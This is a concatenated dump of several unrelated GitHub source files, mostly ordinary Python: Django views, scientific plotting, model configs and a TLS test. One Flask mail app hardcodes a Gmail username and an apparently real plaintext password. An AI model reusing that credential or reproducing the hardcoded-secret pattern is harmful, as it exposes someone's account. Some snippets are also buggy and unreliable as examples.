['presupuesto', 'transporte', 'personal', 'combustible', 'alquiler', 'viaticos', 'donaciones', 'otros']:\n data[key] = data[key].replace(',', '.')\n\n # Validación y conversión de valores a Decimal\n try:\n presupuesto = Decimal(data.get('presupuesto'))\n transporte = Decimal(data.get('transporte'))\n personal = Decimal(data.get('personal'))\n combustible = Decimal(data.get('combustible'))\n alquiler = Decimal(data.get('alquiler'))\n viaticos = Decimal(data.get('viaticos'))\n donaciones = Decimal(data.get('donaciones'))\n otros = Decimal(data.get('otros'))\n\n # Calcula el totalgastado y residuo\n totalgastado = presupuesto - (transporte + personal + combustible + alquiler + viaticos + donaciones + otros)\n residuo = presupuesto - totalgastado\n\n # Asigna los valores calculados\n gasto_obj.presupuesto = presupuesto\n gasto_obj.transporte = transporte\n gasto_obj.personal = personal\n gasto_obj.combustible = combustible\n gasto_obj.alquiler = alquiler\n gasto_obj.viaticos = viaticos\n gasto_obj.donaciones = donaciones\n gasto_obj.otros = otros\n gasto_obj.totalgastado = totalgastado\n gasto_obj.residuo = residuo\n except Exception as e:\n messages.error(request, 'Los valores ingresados deben ser numéricos.', extra_tags=\"danger\")\n return redirect('gastos:list_gasto')\n\n gasto_obj.save()\n\n messages.success(request, 'Gasto actualizado con éxito!', extra_tags=\"success\")\n return redirect('gastos:list_gasto')\n\n return render(request, \"gasto/actualizar_gasto.html\", {\n 'gasto': gasto_obj,\n 'eventos': eventos,\n })\n\n except gasto.DoesNotExist:\n messages.error(request, 'El gasto que intentas actualizar no existe.', extra_tags=\"danger\")\n return redirect('gastos:list_gasto')\n except evento.DoesNotExist:\n messages.error(request, 'El evento asociado no existe.', extra_tags=\"danger\")\n return redirect('gastos:list_gasto')\n except Exception as e:\n messages.error(request, 'Error al actualizar el gasto: ' + str(e), extra_tags=\"danger\")\n return redirect('gastos:list_gasto')","repo_name":"DarioRodriguezSa/comunidad","sub_path":"proyecto/gastos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10634,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32943461883","text":"import os\nfrom datetime import datetime\nimport pandas as pd\n\n\ndef combine_all_summaries():\n date = datetime.today().strftime('%Y-%m-%d')\n summary_dir = 'Database_Summaries'\n\n # Load the summary files\n main_file = os.path.join(summary_dir, 'Summarized_Material_DB_' + date + '.csv')\n mech_file = os.path.join(summary_dir, 'Summarized_Mechanical_Props_Individual_' + date + '.csv')\n chem_file = os.path.join(summary_dir, 'Summarized_Chemical_Composition_' + date + '.csv')\n main_summary = pd.read_csv(main_file, index_col=0)\n mechanical_summary = pd.read_csv(mech_file, index_col=0)\n chemical_summary = pd.read_csv(chem_file)\n\n # Columns to keep in each\n mech_cols = ['citekey', 'Yield Stress [MPa]', 'Elastic Modulus [MPa]', 'Fracture Strain']\n chem_cols = ['C', 'Si', 'Mn', 'P', 'S', 'N', 'Cu', 'Mo', 'Ni',\n 'Cr', 'V', 'Nb', 'Ti', 'Al', 'B', 'Zr', 'Sn', 'Ca', 'H', 'Fe']\n\n # DB tag to directories to map chemical compositions\n tag_dir_map = pd.read_csv('Clean_Data/db_tag_clean_data_map.csv', header=None, names=['ind', 'cpath'])\n cpath = [os.path.normpath(p) for p in tag_dir_map['cpath']]\n cpath = [os.sep.join(p.split(os.sep)[1:-1]) for p in cpath]\n # Create chem comps list\n chem_comps = {}\n for i, cp in enumerate(cpath):\n for j, chem_row_j in enumerate(chemical_summary['cpath']):\n if cp in chem_row_j:\n chem_comps[tag_dir_map.iloc[i]['ind']] = chemical_summary.iloc[j][chem_cols]\n break\n chem_comp_df = pd.DataFrame.from_dict(chem_comps, orient='index')\n\n # Combine all the data\n tag_map_2 = tag_dir_map.set_index('ind', drop=True)\n tag_map_2['cpath'] = tag_map_2['cpath'].apply(os.path.normpath)\n main_summary[mech_cols] = mechanical_summary[mech_cols]\n main_summary[chem_cols] = chem_comp_df[chem_cols]\n main_summary['file'] = tag_map_2['cpath']\n # Rename the columns and save to csv\n cols = main_summary.columns\n rename_dict = {}\n for c in cols:\n rename_dict[c] = c.lower().replace('.', '').replace('[', '_').replace(']', '_').replace(' ', '_')\n main_summary = main_summary.rename(rename_dict, axis='columns')\n main_summary.to_csv(os.path.join(summary_dir, 'Overall_Summary_' + date + '.csv'), index_label='hidden_index')\n\n\nif __name__ == \"__main__\":\n combine_all_summaries()\n","repo_name":"ahartloper/rlmtp","sub_path":"Database_Management/combine_all_summaries.py","file_name":"combine_all_summaries.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32527630922","text":"from pcs.cli.common.errors import CmdLineInputError\n\n\ndef qdevice_status_cmd(lib, argv, modifiers):\n \"\"\"\n Options:\n * --full - get more detailed output\n \"\"\"\n modifiers.ensure_only_supported(\"--full\")\n if not argv or len(argv) > 2:\n raise CmdLineInputError()\n model = argv[0]\n cluster = None if len(argv) < 2 else argv[1]\n print(\n lib.qdevice.qdevice_status_text(\n model,\n verbose=modifiers.get(\"--full\"),\n cluster=cluster,\n )\n )\n\n\ndef qdevice_setup_cmd(lib, argv, modifiers):\n \"\"\"\n Options:\n * --enable - enable qdevice service\n * --start - start qdevice service\n \"\"\"\n modifiers.ensure_only_supported(\"--enable\", \"--start\")\n if len(argv) != 2:\n raise CmdLineInputError()\n if argv[0] != \"model\":\n raise CmdLineInputError()\n model = argv[1]\n lib.qdevice.qdevice_setup(\n model, modifiers.get(\"--enable\"), modifiers.get(\"--start\")\n )\n\n\ndef qdevice_destroy_cmd(lib, argv, modifiers):\n \"\"\"\n Options:\n * --force - destroy qdevice even if it is used by clusters\n \"\"\"\n modifiers.ensure_only_supported(\"--force\")\n if len(argv) != 1:\n raise CmdLineInputError()\n model = argv[0]\n lib.qdevice.qdevice_destroy(model, proceed_if_used=modifiers.get(\"--force\"))\n\n\ndef qdevice_start_cmd(lib, argv, modifiers):\n \"\"\"\n Options: no options\n \"\"\"\n modifiers.ensure_only_supported()\n if len(argv) != 1:\n raise CmdLineInputError()\n model = argv[0]\n lib.qdevice.qdevice_start(model)\n\n\ndef qdevice_stop_cmd(lib, argv, modifiers):\n \"\"\"\n Options:\n * --force - stop qdevice even if it is used by clusters\n \"\"\"\n modifiers.ensure_only_supported(\"--force\")\n if len(argv) != 1:\n raise CmdLineInputError()\n model = argv[0]\n lib.qdevice.qdevice_stop(model, proceed_if_used=modifiers.get(\"--force\"))\n\n\ndef qdevice_kill_cmd(lib, argv, modifiers):\n \"\"\"\n Options: no options\n \"\"\"\n modifiers.ensure_only_supported()\n if len(argv) != 1:\n raise CmdLineInputError()\n model = argv[0]\n lib.qdevice.qdevice_kill(model)\n\n\ndef qdevice_enable_cmd(lib, argv, modifiers):\n \"\"\"\n Options: no options\n \"\"\"\n modifiers.ensure_only_supported()\n if len(argv) != 1:\n raise CmdLineInputError()\n model = argv[0]\n lib.qdevice.qdevice_enable(model)\n\n\ndef qdevice_disable_cmd(lib, argv, modifiers):\n \"\"\"\n Options: no options\n \"\"\"\n modifiers.ensure_only_supported()\n if len(argv) != 1:\n raise CmdLineInputError()\n model = argv[0]\n lib.qdevice.qdevice_disable(model)\n","repo_name":"ClusterLabs/pcs","sub_path":"pcs/qdevice.py","file_name":"qdevice.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":237,"dataset":"github-code","pt":"19"} +{"seq_id":"39699076941","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('lessons', '0001_initial'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='course',\n old_name='date',\n new_name='date_created',\n ),\n ]\n","repo_name":"sjstone2838/deepdive","sub_path":"lessons/migrations/0002_auto_20160102_1804.py","file_name":"0002_auto_20160102_1804.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"10011709530","text":"\"\"\"\nTests, that the ssl connection is not reused for different backends.\nTests thet when the backends are connected with openshift routes using the passthrough tls policy,\nthe first estabilished connection is not reused for all requests to the same IP, that being\nthe Openshift HAProxy router, and the requests are routed to the appropriate backend.\n\"\"\"\n\nimport pytest\n\nfrom packaging.version import Version # noqa # pylint: disable=unused-import\nfrom testsuite import TESTED_VERSION # noqa # pylint: disable=unused-import\nfrom testsuite.echoed_request import EchoedRequest\n\npytestmark = [\n pytest.mark.skipif(\"TESTED_VERSION < Version('2.11')\"),\n pytest.mark.issue(\"https://issues.redhat.com/browse/THREESCALE-6849\")]\n\n\n@pytest.fixture(scope=\"module\")\ndef authority_and_code(valid_authority):\n \"\"\"\n Returns authority for httpbin and return code it should return\n For the testing of connection reuse is just one valid authority sufficient.\n \"\"\"\n return valid_authority, 200\n\n\n# pylint: disable=unused-argument\ndef test_connection_reuse(api_client, mapping_rules):\n \"\"\"\n - Have two backend httpbins with TLS enabled and with TLS passthrough routes.\n - Have a product in 3scale with two backends with different mapping rules\n whose upstream APIs are the httpbins.\n - Have the mTLS policy between APIcast and the backend APIs established.\n - Send requests routed to the first and second backend, to the '/info' httpbin endpoint,\n which returns the information about the httpbin.\n - Assert that each request got routed to the appropriate backend using the information returned\n in the '/info' request (info['tls']['ServerName']).\n (The second request should not use the established TLS connection between the APIcast and\n the first backend)\n\n \"\"\"\n client = api_client()\n\n response_orig = client.get(\"/orig/info\")\n response_new = client.get(\"/new/info\")\n\n assert response_orig.status_code == 200\n assert response_new.status_code == 200\n\n info_orig = EchoedRequest.create(response_orig)\n info_new = EchoedRequest.create(response_new)\n\n assert info_orig.json['tls']['ServerName'] != info_new.json['tls']['ServerName']\n","repo_name":"mijaros/3scale-tests","sub_path":"testsuite/tests/apicast/policy/tls/tls_upstream/tls_passthrough_connection_reuse/test_connection_reuse.py","file_name":"test_connection_reuse.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"24407368347","text":"\"\"\"\nA module with functions for making plots of level schemes,\nmanually (for once you have your data but just want to plot it).\n\nEither single or multi-scheme plots are possible, and we make output in\ntwo different formats.\n\nThe one with a .png extension is a standard image file\n\nThe one with a .svg extension is also an image file, but saved in\nScalable Vector Graphics format, which means it is more easily editable.\nTo open / edit that file, may I recommend `Inkscape `_?\n\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport matplotlib as mpl\nfrom matplotlib.ticker import MultipleLocator\n\nimport utils\n\nmpl.rcParams['lines.linewidth'] = '10'\nmpl.rcParams['axes.linewidth'] = '10'\nmpl.rcParams['lines.dashed_pattern'] = (7, 2)\nmpl.rcParams['lines.dotted_pattern'] = (1, 1.65)\nplt.rcParams[\"font.family\"] = \"Times New Roman\"\nplt.rcParams[\"font.weight\"] = \"bold\"\nplt.rc('text', usetex=True)\nplt.rc('font', size=16)\n# general plot formatting\nplt.style.use('seaborn-white')\n\n\naxis_label_size = 50\n\n# we'll pick colors from this list\n# green blue red\ncolors = ['#7FC97F', '#2E9EDE', '#F80C00', None, None]\n\ncmap = plt.get_cmap('viridis')\n\ndpi_high_res = 200\n\n# dimensions of individual spectrum plots\nx_size = 5\ny_size = 7\n\n# x axis bounds, definitely don't change these unless you're feeling rebellious\nmin_x = 0\nmax_x = 10\n\nenergies_list = [\n [-2.76, -0.98, 0.90, 1.82, 2.79],\n [-2.94, -1.09, 0.69, 1.53, 2.30],\n [-2.81, -1.14, 0.67, 1.41, 2.65],\n [-4.07, -1.37, 0.23, 1.37, 2.62],\n [-4.06, -1.37, 0.23, 1.32, 2.62],\n]\n\nwidths_list = [\n [0, 0, 1.04, 1.16, 5.11],\n [0, 0, 0.66, 0.75, 3.91],\n [0, 0, 0.56, 0.59, 2.50],\n [0, 0, 0.11, 0.61, 2.50],\n [0, 0, 0.10, 0.60, 0.00],\n]\n\n# strings of the form ``J_parity_T[_column]`` (the _column is optional).\nchannel_title_list = [\n [\"1.5_-_1.5\", \"1.5_-_1.5\", \"2.5_-_1.5\", \"0.5_-_1.5\", \"1.5_-_1.5\"],\n [\"1.5_-_1.5\", \"1.5_-_1.5\", \"2.5_-_1.5\", \"0.5_-_1.5\", \"1.5_-_1.5\"],\n [\"1.5_-_1.5\", \"1.5_-_1.5\", \"2.5_-_1.5\", \"0.5_-_1.5\", \"1.5_-_1.5\"],\n [\"1.5_-_1.5\", \"1.5_-_1.5\", \"2.5_-_1.5\", \"0.5_-_1.5\", \"1.5_-_1.5\"],\n [\"?_?_?\", \"?_?_?\", \"2.5_-_?\", \"0.5_-_?\", \"1.5_-_1.5\"],\n]\n\nmain_title_list = [\n \"$4\\\\hbar\\\\Omega$\",\n \"$6\\\\hbar\\\\Omega$\",\n \"$8\\\\hbar\\\\Omega$\",\n \"$8\\\\hbar\\\\Omega$ $\\\\textrm{Pheno}$\",\n \"$\\\\textrm{Experiment}$\",\n]\n\ndef linewidth_from_data_units(linewidth, axis, reference='y'):\n \"\"\"\n Convert a linewidth in data units to linewidth in points.\n (many thanks to stack exchange!)\n\n linewidth:\n float, how big you want your line to be, in data units\n\n axis:\n axis object on which your graph is made\n\n reference:\n string, x or y, which axis data units?\n \"\"\"\n\n fig = axis.get_figure()\n if reference == 'x':\n length = fig.bbox_inches.width * axis.get_position().width\n value_range = np.diff(axis.get_xlim())\n elif reference == 'y':\n length = fig.bbox_inches.height * axis.get_position().height\n value_range = np.diff(axis.get_ylim())\n # Convert length to points\n length *= 72\n # Scale linewidth to value range\n return linewidth * (length / value_range)\n\n\ndef plot_levels(energies, widths, channel_titles, main_title,\n min_y, max_y, ax=None, y_label=\"E [MeV]\",\n colors=None):\n \"\"\"\n Makes a plot of a single level scheme.\n\n energies:\n list of floats, energies to plot\n\n widths:\n list of floats, widths to plot\n\n channel_titles:\n list of strings, text to be placed beside levels\n\n main_title:\n main plot title, usually something like 2\\\\hbar\\\\Omega\n\n min_y, max_y:\n two floats, if a width would go outside these bounds, we cut it off\n\n ax:\n matplotlib axis object on which we wish to make this plot.\n If you're just making a single plot there's no need to worry about this\n it's just useful if you're putting multiple ones on the same figure.\n\n y_label:\n string, label for the y axis\n\n colors:\n colors for each level's width, in any matplotlib-compatible format\n\n \"\"\"\n # set up plot\n if ax is None:\n _, ax = plt.subplots(figsize=(x_size, y_size))\n\n # Add titles\n for axis in ['top','bottom','left','right']:\n ax.spines[axis].set_linewidth(3)\n ax.set_title(\n \"{}\".format(main_title), loc='center', pad=15,\n fontsize=axis_label_size, fontweight=20, color='black', fontname='Times New Roman')\n ax.set_xlabel(\"\")\n ax.set_ylabel(y_label, fontsize=axis_label_size, fontname='Times New Roman')\n ax.set_xticks([])\n ax.yaxis.set_minor_locator(MultipleLocator(0.25))\n ax.yaxis.set_major_locator(MultipleLocator(2))\n ax.tick_params(axis=\"y\", which='both', left=True, right=False, labelsize=50)\n ax.tick_params(which='both', direction='in', length=18, width=3)\n ax.tick_params(which='minor', length=9, width=2)\n x = np.linspace(min_x, 0.7*max_x, num=len(energies), endpoint=True).tolist()\n x_inc = x[1] - x[0]\n\n # plot dotted line at zero energy\n ax.plot([min_x-5, max_x+5], [0, 0], 'k--', linewidth=3,\n solid_capstyle=\"butt\", alpha=0.3, dashes=(2,2))\n\n # plot each energy line with a bar around it depending on width\n # also add titles for energy, state label, width\n energies = np.array(energies)\n widths = np.array(widths)\n idx = list(reversed(np.argsort(energies)))\n energies = energies[idx]\n widths = widths[idx]\n\n for i in range(len(energies)):\n # make an initial skinny plot for each energy value\n ax.plot(x, [energies[i]]*len(x),\n marker='', color='k', linewidth=3, alpha=1,\n solid_capstyle=\"butt\")\n\n # figure out if this energy's width will fit on the plot\n top = energies[i] + widths[i] / 2\n btm = energies[i] - widths[i] / 2\n\n # x value of the middle of this point\n x_mid = 1.15 * (x[i] + x_inc / 2) + 0.4\n\n if energies[i] < 0: # bound state\n ax.plot(x, [energies[i]]*len(x), marker='', color=\"black\",\n linewidth=1, alpha=1, solid_capstyle=\"butt\")\n else: # typical resonance where the width bars will fit\n x_width = 1.5*linewidth_from_data_units(x_inc, ax, reference=\"x\")\n ax.plot([x_mid, x_mid], [top, btm], marker='', color=colors[i],\n linewidth=x_width, alpha=1, solid_capstyle='butt')\n \n # state info (J, pi, T, in the form J^p T) title\n plot_title = utils.plot_title_2(channel_titles[i])\n ax.text(9, energies[i]+0.4, plot_title,\n horizontalalignment='center', fontsize=40, color='black',\n verticalalignment='center')\n\ndef plot_multi_levels(energies_list, widths_list, channel_title_list,\n main_title_list):\n \"\"\"\n Make plots of many different schemes, stiched together into one figure.\n\n energies_list:\n list of list of floats, energies of each channel on each plot\n\n widths_list:\n list of list of floats, widths of each channel on each plot\n\n channel_title_list:\n list of list of strings, titles of each channel on each plot\n\n main_title_list:\n list of strings, main titles of each plot\n \"\"\"\n n_spectra = len(energies_list)\n n_lines = max([len(e) for e in energies_list])\n\n # make main figure\n _, axes = plt.subplots(\n nrows=1, ncols=n_spectra, sharex=True, sharey=True,\n figsize=(x_size*n_spectra, y_size))\n if type(axes) != np.ndarray:\n axes = [axes]\n\n max_energy = max([max(e) for e in energies_list])\n min_energy = min([min(e) for e in energies_list])\n\n # we'll cut the resonance widths off depending on \"factor\"\n factor = 0.2\n max_y = max_energy + factor * abs(max_energy-min_energy)\n min_y = min_energy - factor * abs(max_energy-min_energy)\n # plot each individual spectrum\n for ax, e, w, ct, mt in zip(axes, energies_list, widths_list,\n channel_title_list, main_title_list):\n plot_levels(\n e, w, ct, mt, min_y, max_y, ax=ax, y_label=\"\", colors=colors)\n\n # set x limits\n plt.xlim(min_x-1, max_x+1)\n # set y limits\n plt.ylim(-4.5, 5)\n\n # put title only on the first one\n axes[0].set_ylabel(\"$E$ $\\\\textrm{[MeV]}$\", fontsize=axis_label_size)\n\n # then save the plot\n if not os.path.exists(\"level_schemes\"):\n os.mkdir(\"level_schemes\")\n fig_path = os.path.join(\"level_schemes\", \"level_scheme\")\n plt.tight_layout()\n plt.savefig(fig_path+\".png\", dpi=dpi_high_res)\n plt.savefig(fig_path+\".svg\")\n plt.savefig(fig_path+\".pdf\")\n print(\"Saved level scheme plot as\", fig_path+\".png\")\n\nplot_multi_levels(energies_list, widths_list, channel_title_list, main_title_list)\n\n","repo_name":"callum-mccracken/ncsmc_python","sub_path":"scheme_plot_manual.py","file_name":"scheme_plot_manual.py","file_ext":"py","file_size_in_byte":8788,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"37539574436","text":"from typing import Tuple, List, Literal, Optional\n\nfrom comvex.utils import ConfigBase, EfficientNetBackboneConfig, BiFPNConfig\n\n\nclass EfficientDetBackboneConfig(ConfigBase):\n def __init__(\n self,\n efficientnet_backbone_config: EfficientNetBackboneConfig,\n image_shapes: Tuple[int],\n bifpn_num_layers: int,\n bifpn_channel: int,\n dimension: int = 2,\n upsample_mode: Literal[\"nearest\", \"linear\", \"bilinear\", \"bicubic\", \"trilinear\"] = \"nearest\",\n use_bias: bool = True,\n use_conv_after_downsampling: bool = True,\n norm_mode: Literal[\"fast_norm\", \"softmax\", \"channel_fast_norm\", \"channel_softmax\"] = \"fast_norm\",\n batch_norm_epsilon: float = 1e-5,\n batch_norm_momentum: float = 1e-1,\n feature_map_indices: Optional[List[int]] = None\n ) -> None:\n super().__init__()\n\n self.efficientnet_backbone_config = efficientnet_backbone_config\n self.image_shapes = image_shapes\n\n bifpn_config = BiFPNConfig(\n bifpn_num_layers=bifpn_num_layers,\n bifpn_channel=bifpn_channel,\n channels_in_nodes=[],\n shapes_in_nodes=[],\n dimension=dimension,\n upsample_mode=upsample_mode,\n use_bias=use_bias,\n use_conv_after_downsampling=use_conv_after_downsampling,\n norm_mode=norm_mode,\n batch_norm_epsilon=batch_norm_epsilon,\n batch_norm_momentum=batch_norm_momentum,\n )\n for name, value in bifpn_config.__dict__.items():\n if not name in [\"channels_in_nodes\", \"shapes_in_nodes\"]: # These will be handled automatically in `EfficientDetBackbone`\n setattr(self, name, value)\n \n self.feature_map_indices = feature_map_indices\n\n @classmethod\n def D0(cls, **kwargs) -> \"EfficientDetBackboneConfig\":\n return cls(\n EfficientNetBackboneConfig.B0(resolution=512, strides=[1, *([2]*7), 1]), # EfficientDet uses stride=2 from stage 2 to 8\n (512, 512),\n 3,\n 64,\n **kwargs\n )\n \n @classmethod\n def D1(cls, **kwargs) -> \"EfficientDetBackboneConfig\":\n return cls(\n EfficientNetBackboneConfig.B1(resolution=640, strides=[1, *([2]*7), 1]), # EfficientDet uses stride=2 from stage 2 to 8\n (640, 640),\n 4,\n 88,\n **kwargs\n )\n\n @classmethod\n def D2(cls, **kwargs) -> \"EfficientDetBackboneConfig\":\n return cls(\n EfficientNetBackboneConfig.B2(resolution=768, strides=[1, *([2]*7), 1]), # EfficientDet uses stride=2 from stage 2 to 8\n (768, 768),\n 5,\n 112,\n **kwargs\n )\n\n @classmethod\n def D3(cls, **kwargs) -> \"EfficientDetBackboneConfig\":\n return cls(\n EfficientNetBackboneConfig.B3(resolution=896, strides=[1, *([2]*7), 1]), # EfficientDet uses stride=2 from stage 2 to 8\n (896, 896),\n 6,\n 120,\n **kwargs\n )\n\n @classmethod\n def D4(cls, **kwargs) -> \"EfficientDetBackboneConfig\":\n return cls(\n EfficientNetBackboneConfig.B4(resolution=1024, strides=[1, *([2]*7), 1]), # EfficientDet uses stride=2 from stage 2 to 8\n (1024, 1024),\n 7,\n 224,\n **kwargs\n )\n\n @classmethod\n def D5(cls, **kwargs) -> \"EfficientDetBackboneConfig\":\n return cls(\n EfficientNetBackboneConfig.B5(resolution=1280, strides=[1, *([2]*7), 1]), # EfficientDet uses stride=2 from stage 2 to 8\n (1280, 1280),\n 7,\n 288,\n **kwargs\n )\n\n @classmethod\n def D6(cls, **kwargs) -> \"EfficientDetBackboneConfig\":\n return cls(\n EfficientNetBackboneConfig.B6(resolution=1280, strides=[1, *([2]*7), 1]), # EfficientDet uses stride=2 from stage 2 to 8\n (1280, 1280),\n 8,\n 384,\n **kwargs\n )\n\n @classmethod\n def D7(cls, **kwargs) -> \"EfficientDetBackboneConfig\":\n return cls(\n EfficientNetBackboneConfig.B6(resolution=1536, strides=[1, *([2]*7), 1]), # EfficientDet uses stride=2 from stage 2 to 8\n (1536, 1536),\n 8,\n 384,\n **kwargs\n )\n\n @classmethod\n def D7x(cls, **kwargs) -> \"EfficientDetBackboneConfig\":\n return cls(\n EfficientNetBackboneConfig.B7(resolution=1536, strides=[1, *([2]*7), 1]), # EfficientDet uses stride=2 from stage 2 to 8\n (1536, 1536),\n 8,\n 384,\n **kwargs\n )\n\n \nclass EfficientDetObjectDetectionConfig(ConfigBase):\n def __init__(\n self,\n efficientdet_backbone_config: EfficientDetBackboneConfig,\n num_pred_layers: int,\n num_classes: int,\n num_anchors: int,\n use_seperable_conv: bool = True,\n path_dropout: float = 0.,\n ) -> None:\n super().__init__()\n\n self.efficientdet_backbone_config = efficientdet_backbone_config\n self.num_pred_layers = num_pred_layers\n self.num_classes = num_classes\n self.num_anchors = num_anchors\n self.use_seperable_conv = use_seperable_conv\n self.path_dropout = path_dropout\n\n @classmethod\n def D0(cls, num_classes: int, num_anchors: int, **kwargs) -> \"EfficientDetObjectDetectionConfig\":\n \n return cls(\n EfficientDetBackboneConfig.D0(),\n num_pred_layers=3,\n num_classes=num_classes,\n num_anchors=num_anchors,\n **kwargs\n )\n \n @classmethod\n def D1(cls, num_classes: int, num_anchors: int, **kwargs) -> \"EfficientDetObjectDetectionConfig\":\n return cls(\n EfficientDetBackboneConfig.D1(),\n num_pred_layers=3,\n num_classes=num_classes,\n num_anchors=num_anchors,\n **kwargs\n )\n\n @classmethod\n def D2(cls, num_classes: int, num_anchors: int, **kwargs) -> \"EfficientDetObjectDetectionConfig\":\n return cls(\n EfficientDetBackboneConfig.D2(),\n num_pred_layers=3,\n num_classes=num_classes,\n num_anchors=num_anchors,\n **kwargs\n )\n\n @classmethod\n def D3(cls, num_classes: int, num_anchors: int, **kwargs) -> \"EfficientDetObjectDetectionConfig\":\n return cls(\n EfficientDetBackboneConfig.D3(),\n num_pred_layers=4,\n num_classes=num_classes,\n num_anchors=num_anchors,\n **kwargs\n )\n\n @classmethod\n def D4(cls, num_classes: int, num_anchors: int, **kwargs) -> \"EfficientDetObjectDetectionConfig\":\n return cls(\n EfficientDetBackboneConfig.D4(),\n num_pred_layers=4,\n num_classes=num_classes,\n num_anchors=num_anchors,\n **kwargs\n )\n\n @classmethod\n def D5(cls, num_classes: int, num_anchors: int, **kwargs) -> \"EfficientDetObjectDetectionConfig\":\n return cls(\n EfficientDetBackboneConfig.D5(),\n num_pred_layers=4,\n num_classes=num_classes,\n num_anchors=num_anchors,\n **kwargs\n )\n\n @classmethod\n def D6(cls, num_classes: int, num_anchors: int, **kwargs) -> \"EfficientDetObjectDetectionConfig\":\n return cls(\n EfficientDetBackboneConfig.D6(),\n num_pred_layers=5,\n num_classes=num_classes,\n num_anchors=num_anchors,\n **kwargs\n )\n\n @classmethod\n def D7(cls, num_classes: int, num_anchors: int, **kwargs) -> \"EfficientDetObjectDetectionConfig\":\n return cls(\n EfficientDetBackboneConfig.D7(),\n num_pred_layers=5,\n num_classes=num_classes,\n num_anchors=num_anchors,\n **kwargs\n )\n\n @classmethod\n def D7x(cls, num_classes: int, num_anchors: int, **kwargs) -> \"EfficientDetObjectDetectionConfig\":\n return cls(\n EfficientDetBackboneConfig.D7x(),\n num_pred_layers=5,\n num_classes=num_classes,\n num_anchors=num_anchors,\n **kwargs\n )","repo_name":"blakechi/ComVEX","sub_path":"comvex/efficientdet/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":8235,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"19"} +{"seq_id":"390271032","text":"from flask import Flask, render_template, request\r\nfrom flask_mail import Message, Mail\r\nimport random\r\n\r\n\r\napp = Flask(__name__,template_folder='template')\r\n\r\napp.config['MAIL_SERVER'] = 'smtp.gmail.com'\r\napp.config['MAIL_PORT'] = 465\r\napp.config['MAIL_USERNAME'] = \"hoangviet1807@gmail.com\"\r\napp.config['MAIL_PASSWORD'] = \"hoangviet01\"\r\napp.config['MAIL_USE_TLS'] = False\r\napp.config['MAIL_USE_SSL'] = True\r\n\r\nmail = Mail(app)\r\n\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('/index.html')\r\n\r\n@app.route('/send_message', methods=['POST','GET'])\r\ndef send_message():\r\n if request.method == 'POST':\r\n email = request.form['email']\r\n subject = request.form['subject']\r\n msg = request.form['message']\r\n n = random.random()\r\n message = Message(subject, sender=\"hoangviet1807@gmail.com\", recipients=[email])\r\n\r\n message.body = n\r\n\r\n mail.send(message)\r\n\r\n success = \"Mess sended\"\r\n\r\n return render_template(\"result.html\", success = success)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"hoangviet1807/GmailFlask","sub_path":"gmail.py","file_name":"gmail.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28040436707","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Vladya\n\"\"\"\n\nfrom ._google_gtx import translator as google_gtx_translator\nfrom ._google_client5 import translator as google_client5_translator\n\n\nclass Translator(object):\n\n CLASSES = {\n \"google_gtx\": google_gtx_translator.Translator,\n \"google_client5\": google_client5_translator.Translator,\n }\n\n alias_mapping = {\n # For backward compatibility with the settings in the file.\n \"google_client5\": (\n \"google\",\n )\n }\n\n def __init__(self):\n\n self.__translators = {}\n for translator_name, _Translator in self.CLASSES.iteritems():\n self.__translators[translator_name.lower()] = _Translator()\n\n def get_available_translator_services(self):\n return tuple(sorted(self.__translators.iterkeys()))\n\n def _get_translator(self, service):\n\n _service = service.strip().lower()\n if _service not in self.__translators:\n for new_name, aliases in self.alias_mapping.iteritems():\n if _service in aliases:\n _service = new_name.strip().lower()\n break\n if _service not in self.__translators:\n raise ValueError(\"Translator '{0}' not found\".format(service))\n\n return self.__translators[_service]\n\n def translate(self, service, text, dest, src, _update_on_hdd=True):\n translator = self._get_translator(service)\n return translator.translate(text, dest, src, _update_on_hdd)\n\n def get_lang_code(self, service, data):\n translator = self._get_translator(service)\n return translator.get_lang_code(data)\n\n def get_lang_name(self, service, data):\n translator = self._get_translator(service)\n return translator.get_lang_name(data)\n\n def get_all_lang_codes(self, service):\n translator = self._get_translator(service)\n return translator.get_all_lang_codes()\n\n def backup_database(self, service):\n translator = self._get_translator(service)\n return translator.backup_database()\n\n def clear_cache(self, service, local):\n translator = self._get_translator(service)\n return translator.clear_cache(local)\n","repo_name":"NyashniyVladya/Translator3000","sub_path":"game/Translator3000Data/my_python_modules/_translator3000/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"19"} +{"seq_id":"7833379889","text":"import json\nimport datetime\nimport re\nimport pprint\n\n\nregexp = r'\\(.*\\)|\\(\\d+・.*・.*\\)$|\\s| | |\\「|\\」|\\【|\\】|\\『|\\』|\\<|\\>|\\〈|\\〉|\\/|\\[|\\]|\\.|\\,|\\_|\\-|\\−|\\―|\\‐|\\‐|\\‐|\\{|\\}|\\ー|\\、|\\?|\\!|\\。|\\〜|\\~|\\~|\\・'\n\n\ndef create_titles():\n titles = {}\n\n with open('../trim/jfdb_after2003.jsonlines') as f:\n for row in f.readlines():\n obj = json.loads(row)\n title = re.sub(regexp, \"\", 